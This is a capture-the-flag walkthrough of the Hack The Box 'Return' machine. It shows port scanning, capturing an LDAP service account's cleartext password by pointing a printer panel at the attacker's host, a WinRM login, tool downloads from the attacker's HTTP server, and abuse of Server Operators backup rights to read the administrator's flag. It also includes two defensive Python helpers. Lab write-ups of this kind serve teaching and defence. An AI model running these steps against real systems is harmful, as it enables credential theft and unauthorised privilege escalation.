HTB: Return

Enumeration

I ran nmap and found several open ports.

❯ ports=$(nmap -p- -T4 -Pn -n 10.129.111.124 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

❯ echo $ports 
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49679,49697

❯ nmap -sC -sV -Pn -n -p$ports 10.129.111.124 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 22:55 BST
Nmap scan report for 10.129.111.124
Host is up (0.056s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-08 21:14:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-08T21:15:18
|_  start_date: N/A
|_clock-skew: -41m25s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

I first checked the web server on port 80, which is a printer admin panel. In the “Settings” tab I found some information about the printer: the server address, port and username:

I also ran a nikto scan and brute-forced directories with gobuster, but nothing interesting showed up.

I also checked SMB and found that the host is named PRINTER:

❯ crackmapexec smb 10.129.111.124
SMB         10.129.111.124  445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)

User flag

The settings page on the web seems interesting, so I explored it a little. At first glance the “Update” button doesn’t appear to do anything, so I started Burp Suite to see whether the button actually sends anything. It turns out the button sends a POST request containing only the IP, so the other fields are just decoration:

I put my own IP address in the “server address” field and started tcpdump to see whether any packets arrived. As I expected, I received some packets: the server is trying to connect to my host on the LDAP port.

❯ sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
00:01:25.580400 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [SEW], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0
00:01:25.580436 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1735226943, win 0, length 0
00:01:26.148466 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [S], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0
00:01:26.148504 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1, win 0, length 0
00:01:26.714128 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [S], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0
00:01:26.714169 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1, win 0, length 0
^C
6 packets captured
6 packets received by filter
0 packets dropped by kernel

I started a netcat listener on port 389 and opened Wireshark to see more detailed information about the packets.

❯ sudo nc -lvvnp 389
[sudo] password for user: 
listening on [any] 389 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.111.124] 60243
0*`%return\svc-printer�
                       1edFg43012!!

It seems netcat captured something: we know “svc-printer” is a user, and “1edFg43012!!” looks like a password. I opened the packet in Wireshark to see it more clearly:
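What Wireshark shows here, as an added example that is not part of the original writeup: the bytes netcat printed are a BER-encoded LDAP BindRequest using simple authentication, in which the bind DN and the password travel as plain OCTET STRINGs. The Python below decodes such a message. The first sample is reconstructed from the capture above; its messageID (1) and protocol version (3) are assumed, because those bytes were not printable in the netcat output. A second constructed sample shows a SASL bind, which carries no password on the wire, which is the distinction a defender cares about when judging whether a device's LDAP settings can leak credentials this way.

```python
# Added example (not from the writeup): decode the LDAP BindRequest that the
# printer sent to the netcat listener. Sample bytes are reconstructed from the
# capture above; the messageID (1) and LDAP version (3) are assumed, since
# those bytes were not printable in the netcat output.

def read_tlv(buf: bytes, pos: int):
    """Read one BER TLV at buf[pos]. Returns (tag, value, position after it).
    Supports short-form and long-form definite lengths, which is all LDAP uses."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(raw: bytes) -> dict:
    """Parse an LDAPMessage carrying a BindRequest (RFC 4511 section 4.2)."""
    tag, body, _ = read_tlv(raw, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, msgid, pos = read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing messageID INTEGER")
    result = {"message_id": int.from_bytes(msgid, "big")}
    tag, op, _ = read_tlv(body, pos)
    if tag != 0x60:                        # [APPLICATION 0] = BindRequest
        result["op"] = "other"
        return result
    result["op"] = "bind"
    tag, ver, pos = read_tlv(op, 0)
    result["version"] = int.from_bytes(ver, "big")
    tag, name, pos = read_tlv(op, pos)
    result["name"] = name.decode("utf-8", "replace")
    tag, auth, _ = read_tlv(op, pos)
    if tag == 0x80:                        # simple [0] OCTET STRING: cleartext password
        result["auth"] = "simple"
        result["password"] = auth.decode("utf-8", "replace")
    elif tag == 0xA3:                      # sasl [3] SaslCredentials { mechanism, credentials }
        result["auth"] = "sasl"
        _, mech, _ = read_tlv(auth, 0)
        result["mechanism"] = mech.decode("utf-8", "replace")
    else:
        result["auth"] = "unknown"
    return result


def cleartext_credentials(raw: bytes):
    """Return (name, password) if the bind carries a cleartext password, else None."""
    bind = parse_bind_request(raw)
    if bind.get("auth") == "simple":
        return bind["name"], bind["password"]
    return None


# Constructed sample 1: the simple bind the printer sent (compare the nc output above).
SAMPLE_SIMPLE_BIND = (
    bytes.fromhex("302a")            # LDAPMessage SEQUENCE, 42 bytes  -> printed as "0*"
    + bytes.fromhex("020101")        # messageID 1 (assumed)
    + bytes.fromhex("6025")          # BindRequest, 37 bytes           -> printed as "`%"
    + bytes.fromhex("020103")        # version 3 (assumed)
    + bytes.fromhex("0412") + b"return\\svc-printer"   # name, 18 bytes
    + bytes.fromhex("800c") + b"1edFg43012!!"          # simple password, 12 bytes (0x80 is the "�")
)

# Constructed sample 2: a SASL/GSSAPI bind instead; no password travels on the wire.
SAMPLE_SASL_BIND = (
    bytes.fromhex("3014")            # LDAPMessage SEQUENCE, 20 bytes
    + bytes.fromhex("020102")        # messageID 2
    + bytes.fromhex("600f")          # BindRequest, 15 bytes
    + bytes.fromhex("020103")        # version 3
    + bytes.fromhex("0400")          # empty name
    + bytes.fromhex("a308") + bytes.fromhex("0406") + b"GSSAPI"   # SaslCredentials { mechanism }
)

if __name__ == "__main__":
    for sample in (SAMPLE_SIMPLE_BIND, SAMPLE_SASL_BIND):
        print(parse_bind_request(sample), "->", cleartext_credentials(sample))
```

Running the block decodes both samples. The defensive takeaways are the ones the capture already implies: a printer's LDAP settings should only be changeable by an authenticated administrator, should bind to the real domain controller over LDAPS or SASL rather than a simple bind, and should use a least-privilege lookup account instead of one that also carries operator-group rights.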

So indeed, “1edFg43012!!” is the password. I will try to connect to the machine using evil-winrm:

❯ evil-winrm -i 10.129.111.124 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents>

It worked, so first I took the user flag.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> dir ..\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         5/8/2022   2:12 PM             34 user.txt

Root flag

First I tried to list SMB shares as the “svc-printer” user, but found nothing interesting:

❯ crackmapexec smb 10.129.111.124 --shares -u svc-printer -p '1edFg43012!!'
SMB         10.129.111.124  445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.129.111.124  445    PRINTER          [+] return.local\svc-printer:1edFg43012!! 
SMB         10.129.111.124  445    PRINTER          [+] Enumerated shares
SMB         10.129.111.124  445    PRINTER          Share           Permissions     Remark
SMB         10.129.111.124  445    PRINTER          -----           -----------     ------
SMB         10.129.111.124  445    PRINTER          ADMIN$          READ            Remote Admin
SMB         10.129.111.124  445    PRINTER          C$              READ,WRITE      Default share
SMB         10.129.111.124  445    PRINTER          IPC$            READ            Remote IPC
SMB         10.129.111.124  445    PRINTER          NETLOGON        READ            Logon server share 
SMB         10.129.111.124  445    PRINTER          SYSVOL          READ            Logon server share 

Time for enumeration: I uploaded winpeas.exe and executed it.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/winPEASx64.exe -OutFile winpeas.exe
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> .\winpeas.exe

It found something interesting: we are a member of the “BUILTIN\Server Operators” group. We can also confirm this with the “whoami” command:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> 

Searching on Google for a way to escalate privileges using our membership in the “Server Operators” group, I found a page by Cube0x0 that explains two ways members of this group can escalate privileges. The first one Cube0x0 explains is for reading sensitive files; since we only want the root flag, that should be enough for us.
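A check a defender would want at this point, added as an example that is not part of the writeup: the `whoami /groups` table above is easy to scan by eye once, but a script that flags the privileged built-in aliases by their well-known SIDs can be run over the tokens of every service account in a domain. The block below parses that output (the sample is constructed from the writeup's own table) and flags Server Operators and Print Operators; its SID table also covers Administrators, Account Operators and Backup Operators, which is the general form of the same check.

```python
# Added example (not from the writeup): parse `whoami /groups` output and flag
# membership in the built-in groups whose rights can be turned into control of
# a domain controller. The sample input is constructed from the table above.
import re

# Well-known SIDs of the privileged built-in aliases; these are the same on every Windows install.
PRIVILEGED_BUILTIN = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",    # the group svc-printer is a member of
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
}

SID_RE = re.compile(r"\bS-1-(?:\d+-)+\d+\b")


def parse_whoami_groups(text: str):
    """Return a list of (group_name, sid) tuples from `whoami /groups` output.
    Group names contain single spaces, so each row is split on runs of two or
    more spaces (the column padding) rather than on every space."""
    groups = []
    for line in text.splitlines():
        m = SID_RE.search(line)
        if not m:                          # headers, separators and blank lines carry no SID
            continue
        name = re.split(r"\s{2,}", line.strip())[0]
        groups.append((name, m.group(0)))
    return groups


def privileged_memberships(text: str):
    """Return (group_name, sid, well_known_label) for every privileged built-in membership."""
    return [(name, sid, PRIVILEGED_BUILTIN[sid])
            for name, sid in parse_whoami_groups(text)
            if sid in PRIVILEGED_BUILTIN]


# Constructed sample: the rows from the writeup's whoami /groups output.
SAMPLE_WHOAMI = """\
GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\\High Mandatory Level       Label            S-1-16-12288
"""

if __name__ == "__main__":
    for name, sid, label in privileged_memberships(SAMPLE_WHOAMI):
        print(f"[!] {name} ({sid}) is a privileged built-in group: {label}")
```

On the defending side the fix is the obvious one: a service account used by a printer has no reason to sit in Server Operators or Print Operators, so remove it and alert on any later change to the membership of these groups.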

I will first download the two needed DLLs from the suggested repository and start an HTTP server to upload them to the target machine:

❯ git clone https://github.com/giuliano108/SeBackupPrivilege.git
[...]

❯ cd SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug 

❯ ls -la
Permissions Size User Date Modified Name
.rw-r--r--   12k user  9 May  1:02  SeBackupPrivilegeCmdLets.dll
.rw-r--r--   16k user  9 May  1:02  SeBackupPrivilegeUtils.dll

❯ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Now I downloaded them onto the target:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/SeBackupPrivilegeCmdLets.dll -OutFile SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/SeBackupPrivilegeUtils.dll -OutFile SeBackupPrivilegeUtils.dll

I followed the steps in the Cube0x0 guide and imported both DLLs:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll

Now I should be able to traverse (cd into) any directory, local or remote, and list (dir, Get-ChildItem) its contents, so I try to move on to the Administrator home:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         5/8/2022   2:12 PM             34 root.txt

There is the root flag, but we can’t just type root.txt because we don’t have permissions on it. Fortunately for my sake, Cube0x0 also explains how to read files by taking advantage of the same privilege I just exploited.

I will need to act as “backup” software and copy the file to another folder.

To do this I use the Copy-FileSeBackupPrivilege cmdlet from the module I just imported; then I can read the copy:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt C:\windows\temp\root.txt -Overwrite
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type C:\windows\temp\root.txt
{flag}

And that’s my flag!

NOTE: The Cube0x0 guide describes another way to achieve LPE, which gives you a cmd as SYSTEM. If you are curious I encourage you to try it, because of course a cmd as SYSTEM is far more useful than just listing and reading any directory or file on the system.
